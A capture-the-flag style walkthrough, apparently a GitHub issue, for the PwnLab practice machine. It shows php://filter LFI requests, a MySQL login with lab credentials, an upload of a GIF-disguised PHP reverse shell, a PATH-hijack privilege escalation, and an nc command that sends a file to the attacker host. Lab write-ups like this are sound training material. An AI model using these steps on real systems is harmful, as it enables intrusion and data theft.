search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

PwnLab (easy) ★ #28

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago

Keypoints

WDavid404 commented 4 months ago 
PORT      STATE    SERVICE        REASON         VERSION
80/tcp    open     http           syn-ack ttl 61 Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

111/tcp   open     rpcbind        syn-ack ttl 61 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38918/udp   status
|   100024  1          40272/udp6  status
|   100024  1          57037/tcp6  status
|_  100024  1          57762/tcp   status

3306/tcp  open     mysql          syn-ack ttl 61 MySQL (blocked - too many connection errors)
57762/tcp open     status         syn-ack ttl 61 1 (RPC #100024)

Feroxbuster ---> image

Becuase 80/tcp web page URL is like "http://192.168.249.29/?page=login" --> "/?page" may vulneble to LFI attack --> Try LFI。。。。finally, php/filter works

http://192.168.249.29/?page=php://filter/convert.base64-encode/resource=login --> image

http://192.168.249.29/?page=php://filter/convert.base64-encode/resource=config --> image

http://192.168.249.29/?page=php://filter/convert.base64-encode/resource=index --> image include("lang/".$_COOKIE['lang']) --> it read COOKIE['lang']

then, 

mysql -h 192.168.249.29 -u root -p'H4u%QJ_H99'
use Users;
show tables;
select * from users;

--> image

| kent | Sld6WHVCSkpOeQ== |JWzXuBJJNy | mike | U0lmZHNURW42SQ== | SIfdsTEn6I | kane | aVN2NVltMkdSbw== | iSv5Ym2GRo

Login to http://192.168.249.29/ and upload a reverse php file --> Not correct extension.. image

change php file name to php.gif, and upload again --> Got "Error 002"

Try to use GIF format code in the begining of php file --> works image But didn't find a place to call this file.

According to include("lang/".$_COOKIE['lang']) --> it read COOKIE['lang'] use it as LFI image so, we can call our php file with the path and filename info ../upload/450619c0f9b99fca3f46d28787bc55c5.gif --》 image

We got a reverse shell from the target host image

Under /home, there are some users folder image

switch to other use with the credential info that we got image --》 image --》 created a file named cat in /tmp and add it to $PATH.

cd /tmp
echo /bin/bash > cat
chmod +x cat
export PATH=/tmp:$PATH

run ./msgmike again image

image

Transfer msg2root file to our kali machine

mike@pwnlab:/home/mike$ nc -nv 192.168.45.180 80 < msg2root
[kali] nc -lvp 80 > msg2root

then, strings msg2root --> image

so, run ./msg2root hello && /bin/sh (/bin/bash doesn't work) image (Note: we should use /bin/cat because we make a fake cat command that was linked in PATH env)